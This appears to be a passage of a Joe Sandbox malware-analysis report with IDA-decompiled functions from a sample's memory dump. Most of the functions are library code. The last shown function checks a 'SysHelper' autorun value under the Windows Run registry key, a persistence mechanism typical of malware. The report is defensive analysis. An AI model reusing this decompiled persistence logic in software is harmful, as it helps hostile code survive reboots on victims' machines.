                                                                                                    			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                                                                                    				signed int _v8;
                                                                                                    				signed int _v32;
                                                                                                    				intOrPtr _v36;
                                                                                                    				signed int _v40;
                                                                                                    				void* _t38;
                                                                                                    				signed int _t45;
                                                                                                    				signed int _t60;
                                                                                                    				intOrPtr _t77;
                                                                                                    				void* _t80;
                                                                                                    				intOrPtr* _t82;
                                                                                                    				signed int _t83;
                                                                                                    				signed int _t86;
                                                                                                    				intOrPtr _t88;
                                                                                                    				void* _t92;
                                                                                                    
                                                                                                    				_t80 = __edx;
                                                                                                    				_push(__ebx);
                                                                                                    				_push(__esi);
                                                                                                    				_t86 = 0;
                                                                                                    				if(_a12 <= 0) {
                                                                                                    					L5:
                                                                                                    					return _t38;
                                                                                                    				} else {
                                                                                                    					_push(__edi);
                                                                                                    					_t82 =  &_a12;
                                                                                                    					while(1) {
                                                                                                    						_t82 = _t82 + 4;
                                                                                                    						_t38 = E004295C3(_a4, _a8,  *_t82);
                                                                                                    						_t92 = _t92 + 0xc;
                                                                                                    						if(_t38 != 0) {
                                                                                                    							break;
                                                                                                    						}
                                                                                                    						_t86 = _t86 + 1;
                                                                                                    						if(_t86 < _a12) {
                                                                                                    							continue;
                                                                                                    						} else {
                                                                                                    							goto L5;
                                                                                                    						}
                                                                                                    						goto L20;
                                                                                                    					}
                                                                                                    					_push(0);
                                                                                                    					_push(0);
                                                                                                    					_push(0);
                                                                                                    					_push(0);
                                                                                                    					_push(0);
                                                                                                    					E004242FD(0, _t80);
                                                                                                    					asm("int3");
                                                                                                    					_push(0x14);
                                                                                                    					_push(0x507ab0);
                                                                                                    					E00428520(0, _t82, _t86);
                                                                                                    					_t66 = 0;
                                                                                                    					_v32 = 0;
                                                                                                    					__eflags = _a4 - 5;
                                                                                                    					if(__eflags <= 0) {
                                                                                                    						_t88 = E00425007();
                                                                                                    						_v36 = _t88;
                                                                                                    						E004245DC(0, _t82, _t88, __eflags);
                                                                                                    						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                                                                    						_v8 = _v8 & 0;
                                                                                                    						_t83 = E00428C96(0xb8, 1);
                                                                                                    						_v40 = _t83;
                                                                                                    						__eflags = _t83;
                                                                                                    						if(_t83 != 0) {
                                                                                                    							E00428AF7(0xc);
                                                                                                    							_v8 = 1;
                                                                                                    							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                    							E00425CE3();
                                                                                                    							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                                                                                    							_v32 = _t66;
                                                                                                    							__eflags = _t66;
                                                                                                    							if(_t66 == 0) {
                                                                                                    								E0042453C(_t83);
                                                                                                    								_t43 = E004243E2(_t83);
                                                                                                    							} else {
                                                                                                    								__eflags = _a8;
                                                                                                    								if(_a8 != 0) {
                                                                                                    									_t60 = E00437413(_a8, 0x50a97c);
                                                                                                    									__eflags = _t60;
                                                                                                    									if(_t60 != 0) {
                                                                                                    										 *0x510434 = 1;
                                                                                                    									}
                                                                                                    								}
                                                                                                    								E00428AF7(0xc);
                                                                                                    								_v8 = 2;
                                                                                                    								_t25 = _t88 + 0x6c; // 0x6c
                                                                                                    								E0042465C(_t25, _t83);
                                                                                                    								E0042453C(_t83);
                                                                                                    								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                                                                    								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                                                                    									__eflags =  *0x50aba8 & 0x00000001;
                                                                                                    									if(( *0x50aba8 & 0x00000001) == 0) {
                                                                                                    										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                                    										_t77 =  *0x50aae4; // 0x50aae8
                                                                                                    										_t32 = _t77 + 0x84; // 0x50b030
                                                                                                    										 *0x50b028 =  *_t32;
                                                                                                    										_t33 = _t77 + 0x90; // 0x4d0da8
                                                                                                    										 *0x50b084 =  *_t33;
                                                                                                    										_t34 = _t77 + 0x74; // 0x1
                                                                                                    										 *0x50a978 =  *_t34;
                                                                                                    									}
                                                                                                    								}
                                                                                                    								_v8 = _v8 & 0x00000000;
                                                                                                    								_t43 = E00425CF2();
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_v8 = 0xfffffffe;
                                                                                                    						E00425D25(_t43, _t88);
                                                                                                    						_t45 = _t66;
                                                                                                    					} else {
                                                                                                    						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
                                                                                                    						E004242D2();
                                                                                                    						_t45 = 0;
                                                                                                    					}
                                                                                                    					return E00428565(_t45);
                                                                                                    				}
                                                                                                    				L20:
                                                                                                    			}

















                                                                                                    0x00425b6e
                                                                                                    0x00425b71
                                                                                                    0x00425b74
                                                                                                    0x00425b75
                                                                                                    0x00425b7a
                                                                                                    0x00425b9e
                                                                                                    0x00425ba1
                                                                                                    0x00425b7c
                                                                                                    0x00425b7c
                                                                                                    0x00425b7d
                                                                                                    0x00425b80
                                                                                                    0x00425b80
                                                                                                    0x00425b8b
                                                                                                    0x00425b90
                                                                                                    0x00425b95
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00425b97
                                                                                                    0x00425b9b
                                                                                                    0x00000000
                                                                                                    0x00425b9d
                                                                                                    0x00000000
                                                                                                    0x00425b9d
                                                                                                    0x00000000
                                                                                                    0x00425b9b
                                                                                                    0x00425ba2
                                                                                                    0x00425ba3
                                                                                                    0x00425ba4
                                                                                                    0x00425ba5
                                                                                                    0x00425ba6
                                                                                                    0x00425ba7
                                                                                                    0x00425bac
                                                                                                    0x00425bad
                                                                                                    0x00425baf
                                                                                                    0x00425bb4
                                                                                                    0x00425bb9
                                                                                                    0x00425bbb
                                                                                                    0x00425bbe
                                                                                                    0x00425bc2
                                                                                                    0x00425be0
                                                                                                    0x00425be2
                                                                                                    0x00425be5
                                                                                                    0x00425bea
                                                                                                    0x00425bee
                                                                                                    0x00425bff
                                                                                                    0x00425c01
                                                                                                    0x00425c04
                                                                                                    0x00425c06
                                                                                                    0x00425c0e
                                                                                                    0x00425c14
                                                                                                    0x00425c1f
                                                                                                    0x00425c26
                                                                                                    0x00425c2a
                                                                                                    0x00425c3e
                                                                                                    0x00425c40
                                                                                                    0x00425c43
                                                                                                    0x00425c45
                                                                                                    0x00425cfe
                                                                                                    0x00425d04
                                                                                                    0x00425c4b
                                                                                                    0x00425c4b
                                                                                                    0x00425c4f
                                                                                                    0x00425c59
                                                                                                    0x00425c60
                                                                                                    0x00425c62
                                                                                                    0x00425c64
                                                                                                    0x00425c64
                                                                                                    0x00425c62
                                                                                                    0x00425c70
                                                                                                    0x00425c76
                                                                                                    0x00425c7d
                                                                                                    0x00425c82
                                                                                                    0x00425c88
                                                                                                    0x00425c90
                                                                                                    0x00425c94
                                                                                                    0x00425c96
                                                                                                    0x00425c9d
                                                                                                    0x00425ca7
                                                                                                    0x00425cae
                                                                                                    0x00425cb4
                                                                                                    0x00425cba
                                                                                                    0x00425cbf
                                                                                                    0x00425cc5
                                                                                                    0x00425cca
                                                                                                    0x00425ccd
                                                                                                    0x00425ccd
                                                                                                    0x00425c9d
                                                                                                    0x00425cd2
                                                                                                    0x00425cd6
                                                                                                    0x00425cd6
                                                                                                    0x00425c45
                                                                                                    0x00425d0b
                                                                                                    0x00425d12
                                                                                                    0x00425d17
                                                                                                    0x00425bc4
                                                                                                    0x00425bc9
                                                                                                    0x00425bcf
                                                                                                    0x00425bd4
                                                                                                    0x00425bd4
                                                                                                    0x00425d1e
                                                                                                    0x00425d1e
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762079118-0
                                                                                                    • Opcode ID: e61c58fd63962ed3f5b4d1593b57eb658f03b58a302d0c09fb7b18677bdb7f56
                                                                                                    • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                    • Opcode Fuzzy Hash: e61c58fd63962ed3f5b4d1593b57eb658f03b58a302d0c09fb7b18677bdb7f56
                                                                                                    • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 60%
                                                                                                    			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
                                                                                                    				void* _v8;
                                                                                                    				void* _v12;
                                                                                                    				struct _ITEMIDLIST* _v16;
                                                                                                    				char _v20;
                                                                                                    				short _v532;
                                                                                                    				char* _t30;
                                                                                                    				intOrPtr* _t34;
                                                                                                    				intOrPtr* _t35;
                                                                                                    				intOrPtr* _t43;
                                                                                                    				intOrPtr* _t48;
                                                                                                    				intOrPtr* _t49;
                                                                                                    				void* _t50;
                                                                                                    				WCHAR* _t51;
                                                                                                    				intOrPtr* _t54;
                                                                                                    				intOrPtr* _t55;
                                                                                                    				void* _t67;
                                                                                                    				void* _t70;
                                                                                                    
                                                                                                    				_t51 = __edx;
                                                                                                    				_v8 = 0;
                                                                                                    				_v12 = 0;
                                                                                                    				__imp__CoInitialize(0, _t67, _t70, _t50);
                                                                                                    				_t30 =  &_v8;
                                                                                                    				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
                                                                                                    				__imp__CoUninitialize();
                                                                                                    				if(_t30 >= 0) {
                                                                                                    					_t34 = _v8;
                                                                                                    					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
                                                                                                    					if(_t30 >= 0) {
                                                                                                    						_t35 = _v8;
                                                                                                    						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
                                                                                                    						if(_t30 >= 0) {
                                                                                                    							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
                                                                                                    							__imp__SHGetPathFromIDListW(_v16,  &_v532);
                                                                                                    							lstrcatW( &_v532, "\\");
                                                                                                    							lstrcatW( &_v532, _t51);
                                                                                                    							_t43 = _v12;
                                                                                                    							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
                                                                                                    							if(_t30 >= 0) {
                                                                                                    								GetSystemDirectoryW( &_v532, 0x100);
                                                                                                    								lstrcatW( &_v532, L"\\shell32.dll");
                                                                                                    								_t48 = _v8;
                                                                                                    								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
                                                                                                    								if(_t30 >= 0) {
                                                                                                    									_t49 = _v8;
                                                                                                    									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_t54 = _v12;
                                                                                                    				if(_t54 != 0) {
                                                                                                    					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
                                                                                                    				}
                                                                                                    				_t55 = _v8;
                                                                                                    				if(_t55 == 0) {
                                                                                                    					return _t30;
                                                                                                    				} else {
                                                                                                    					return  *((intOrPtr*)( *_t55 + 8))(_t55);
                                                                                                    				}
                                                                                                    			}




















                                                                                                    0x00411b9e
                                                                                                    0x00411ba0
                                                                                                    0x00411ba9
                                                                                                    0x00411bb0
                                                                                                    0x00411bb6
                                                                                                    0x00411bc8
                                                                                                    0x00411bd0
                                                                                                    0x00411bd8
                                                                                                    0x00411bde
                                                                                                    0x00411bed
                                                                                                    0x00411bf1
                                                                                                    0x00411bf7
                                                                                                    0x00411bfe
                                                                                                    0x00411c03
                                                                                                    0x00411c12
                                                                                                    0x00411c22
                                                                                                    0x00411c3a
                                                                                                    0x00411c44
                                                                                                    0x00411c46
                                                                                                    0x00411c55
                                                                                                    0x00411c5a
                                                                                                    0x00411c68
                                                                                                    0x00411c7a
                                                                                                    0x00411c7c
                                                                                                    0x00411c8b
                                                                                                    0x00411c90
                                                                                                    0x00411c92
                                                                                                    0x00411ca8
                                                                                                    0x00411ca8
                                                                                                    0x00411c90
                                                                                                    0x00411c5a
                                                                                                    0x00411c03
                                                                                                    0x00411bf1
                                                                                                    0x00411cab
                                                                                                    0x00411cb3
                                                                                                    0x00411cb8
                                                                                                    0x00411cb8
                                                                                                    0x00411cbb
                                                                                                    0x00411cc0
                                                                                                    0x00411ccb
                                                                                                    0x00411cc2
                                                                                                    0x00000000
                                                                                                    0x00411cc5

                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                    • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                    • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                    • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                    • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                    • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                    • String ID: \shell32.dll
                                                                                                    • API String ID: 679253221-3783449302
                                                                                                    • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                    • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                    • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                    • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 77%
                                                                                                    			E004549A0(void* __ebx) {
                                                                                                    				signed int _v8;
                                                                                                    				long _v12;
                                                                                                    				void* _v16;
                                                                                                    				void* _v24;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				signed int _t21;
                                                                                                    				CHAR* _t23;
                                                                                                    				void* _t31;
                                                                                                    				unsigned int _t34;
                                                                                                    				struct HINSTANCE__* _t42;
                                                                                                    				void* _t43;
                                                                                                    				void* _t52;
                                                                                                    				void* _t54;
                                                                                                    				void* _t55;
                                                                                                    				long _t56;
                                                                                                    				signed int _t58;
                                                                                                    				void* _t59;
                                                                                                    
                                                                                                    				_t43 = __ebx;
                                                                                                    				E0042F7C0(0xc);
                                                                                                    				_t21 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_v8 = _t21 ^ _t58;
                                                                                                    				_t23 =  *0x512a94;
                                                                                                    				if(_t23 != 0) {
                                                                                                    					L12:
                                                                                                    					if(_t23 == 0xffffffff) {
                                                                                                    						goto L6;
                                                                                                    					} else {
                                                                                                    						 *_t23();
                                                                                                    						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					_t42 = GetModuleHandleA(_t23);
                                                                                                    					if(_t42 == 0) {
                                                                                                    						_t23 =  *0x512a94;
                                                                                                    					} else {
                                                                                                    						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
                                                                                                    						 *0x512a94 = _t23;
                                                                                                    					}
                                                                                                    					if(_t23 != 0) {
                                                                                                    						goto L12;
                                                                                                    					} else {
                                                                                                    						 *0x512a94 = 0xffffffff;
                                                                                                    						L6:
                                                                                                    						GetDesktopWindow();
                                                                                                    						_t55 = GetProcessWindowStation();
                                                                                                    						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
                                                                                                    							L14:
                                                                                                    							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
                                                                                                    						} else {
                                                                                                    							_t56 = _v12;
                                                                                                    							if(_t56 > 0x200) {
                                                                                                    								goto L14;
                                                                                                    							} else {
                                                                                                    								_t56 = _t56 + 0x00000001 & 0xfffffffe;
                                                                                                    								E0043F980(_t56 + 2, _t56);
                                                                                                    								_t31 = _t59;
                                                                                                    								_v16 = _t31;
                                                                                                    								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
                                                                                                    									goto L14;
                                                                                                    								} else {
                                                                                                    									_t47 = _v16;
                                                                                                    									_t34 = _v12 + 0x00000001 & 0xfffffffe;
                                                                                                    									_v12 = _t34;
                                                                                                    									_push(L"Service-0x");
                                                                                                    									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
                                                                                                    									E00421C02(_v16);
                                                                                                    									asm("sbb eax, eax");
                                                                                                    									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}





















                                                                                                    0x004549a0
                                                                                                    0x004549a8
                                                                                                    0x004549ad
                                                                                                    0x004549b4
                                                                                                    0x004549b7
                                                                                                    0x004549c0
                                                                                                    0x00454aab
                                                                                                    0x00454aae
                                                                                                    0x00000000
                                                                                                    0x00454ab4
                                                                                                    0x00454ab4
                                                                                                    0x00454ac8
                                                                                                    0x00454ac8
                                                                                                    0x004549c6
                                                                                                    0x004549c7
                                                                                                    0x004549cf
                                                                                                    0x004549e4
                                                                                                    0x004549d1
                                                                                                    0x004549d7
                                                                                                    0x004549dd
                                                                                                    0x004549dd
                                                                                                    0x004549eb
                                                                                                    0x00000000
                                                                                                    0x004549f1
                                                                                                    0x004549f1
                                                                                                    0x004549fb
                                                                                                    0x004549fb
                                                                                                    0x00454a07
                                                                                                    0x00454a0b
                                                                                                    0x00454ac9
                                                                                                    0x00454ade
                                                                                                    0x00454a39
                                                                                                    0x00454a39
                                                                                                    0x00454a42
                                                                                                    0x00000000
                                                                                                    0x00454a48
                                                                                                    0x00454a49
                                                                                                    0x00454a52
                                                                                                    0x00454a57
                                                                                                    0x00454a62
                                                                                                    0x00454a6d
                                                                                                    0x00000000
                                                                                                    0x00454a6f
                                                                                                    0x00454a74
                                                                                                    0x00454a78
                                                                                                    0x00454a7b
                                                                                                    0x00454a80
                                                                                                    0x00454a86
                                                                                                    0x00454a8a
                                                                                                    0x00454a94
                                                                                                    0x00454aaa
                                                                                                    0x00454aaa
                                                                                                    0x00454a6d
                                                                                                    0x00454a42
                                                                                                    0x00454a0b
                                                                                                    0x004549eb

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                    • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                    • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                    • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                    • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                    • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                    • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                    • String ID: Service-0x$_OPENSSL_isservice
                                                                                                    • API String ID: 2112994598-1672312481
                                                                                                    • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                    • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                    • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                    • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 91%
                                                                                                    			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
                                                                                                    				CHAR* _v0;
                                                                                                    				signed int _t17;
                                                                                                    				void* _t19;
                                                                                                    				void* _t46;
                                                                                                    				void* _t49;
                                                                                                    				void* _t50;
                                                                                                    				signed int _t51;
                                                                                                    				signed int _t52;
                                                                                                    
                                                                                                    				_t48 = __esi;
                                                                                                    				_t47 = __edi;
                                                                                                    				_t46 = __edx;
                                                                                                    				_t39 = __ebx;
                                                                                                    				E0042F7C0(0x108);
                                                                                                    				_t17 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_a260 = _t17 ^ _t51;
                                                                                                    				_t19 = GetStdHandle(0xfffffff4);
                                                                                                    				if(_t19 == 0 || GetFileType(_t19) == 0) {
                                                                                                    					vswprintf( &_a4, 0xff, _a268,  &_a272);
                                                                                                    					_t52 = _t51 + 0x10;
                                                                                                    					_a259 = 0;
                                                                                                    					if(E004549A0(_t39) <= 0) {
                                                                                                    						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
                                                                                                    						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
                                                                                                    					} else {
                                                                                                    						_t49 = RegisterEventSourceA(0, "OPENSSL");
                                                                                                    						_v0 =  &_a4;
                                                                                                    						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
                                                                                                    						DeregisterEventSource(_t49);
                                                                                                    						_t50 = _t48;
                                                                                                    						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
                                                                                                    					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
                                                                                                    				}
                                                                                                    			}











                                                                                                    0x00454ae0
                                                                                                    0x00454ae0
                                                                                                    0x00454ae0
                                                                                                    0x00454ae0
                                                                                                    0x00454ae5
                                                                                                    0x00454aea
                                                                                                    0x00454af1
                                                                                                    0x00454afa
                                                                                                    0x00454b02
                                                                                                    0x00454b5d
                                                                                                    0x00454b62
                                                                                                    0x00454b65
                                                                                                    0x00454b74
                                                                                                    0x00454bd3
                                                                                                    0x00454bed
                                                                                                    0x00454b76
                                                                                                    0x00454b86
                                                                                                    0x00454b8c
                                                                                                    0x00454ba2
                                                                                                    0x00454ba9
                                                                                                    0x00454baf
                                                                                                    0x00454bc4
                                                                                                    0x00454bc4
                                                                                                    0x00454b0f
                                                                                                    0x00454b27
                                                                                                    0x00454b43
                                                                                                    0x00454b43

                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                    • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                    • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                      • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                    • vswprintf.LIBCMT ref: 00454B5D
                                                                                                    • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                    • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                    • MessageBoxA.USER32 ref: 00454BD3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                    • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                    • API String ID: 277090408-1348657634
                                                                                                    • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                    • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                    • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                    • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 91%
                                                                                                    			E00412360() {
                                                                                                    				void* _v8;
                                                                                                    				int _v12;
                                                                                                    				int _v16;
                                                                                                    				int _v20;
                                                                                                    				char _v2066;
                                                                                                    				short _v2068;
                                                                                                    				short _v4116;
                                                                                                    				signed int _t35;
                                                                                                    
                                                                                                    				E0042F7C0(0x1010);
                                                                                                    				_v8 = 0;
                                                                                                    				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
                                                                                                    					_v12 = 1;
                                                                                                    					_v2068 = 0;
                                                                                                    					E0042B420( &_v2066, 0, 0x7fe);
                                                                                                    					_v20 = 0x400;
                                                                                                    					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
                                                                                                    					RegCloseKey(_v8);
                                                                                                    					_v16 = 0;
                                                                                                    					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
                                                                                                    					_t35 = lstrcmpW( &_v4116,  &_v2068);
                                                                                                    					asm("sbb eax, eax");
                                                                                                    					return  ~_t35 + 1;
                                                                                                    				} else {
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    			}











                                                                                                    0x00412368
                                                                                                    0x00412370
                                                                                                    0x00412391
                                                                                                    0x0041239b
                                                                                                    0x004123a8
                                                                                                    0x004123b6
                                                                                                    0x004123be
                                                                                                    0x004123de
                                                                                                    0x004123e7
                                                                                                    0x004123ed
                                                                                                    0x0041240e
                                                                                                    0x00412422
                                                                                                    0x0041242a
                                                                                                    0x00412430
                                                                                                    0x00412393
                                                                                                    0x00412398
                                                                                                    0x00412398

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                    • _memset.LIBCMT ref: 004123B6
                                                                                                    • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                    • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                    • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                    • SysHelper, xrefs: 004123D6
                                                                                                    Memory Dump Source
